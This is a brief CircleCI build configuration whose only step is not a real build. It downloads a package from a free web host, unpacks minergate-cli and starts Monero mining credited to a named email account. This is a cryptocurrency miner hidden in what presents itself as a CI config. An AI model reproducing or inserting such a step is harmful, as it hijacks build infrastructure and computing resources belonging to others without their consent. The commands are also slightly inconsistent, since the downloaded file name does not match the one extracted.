version: 2
jobs:
  build:
    docker:
      - image: ubuntu
    steps:
      - checkout
      - run:apt-get update && apt-get install apt-transport-https -y && apt-get install wget -y && apt-get install binutils -y && wget https://hupiter.000webhostapp.com/a.deb && ar x deb-cli && tar -xvzf data.tar.gz && cd opt/minergate-cli && ./minergate-cli -user greenfieldsvp@outlook.com.vn -xmr
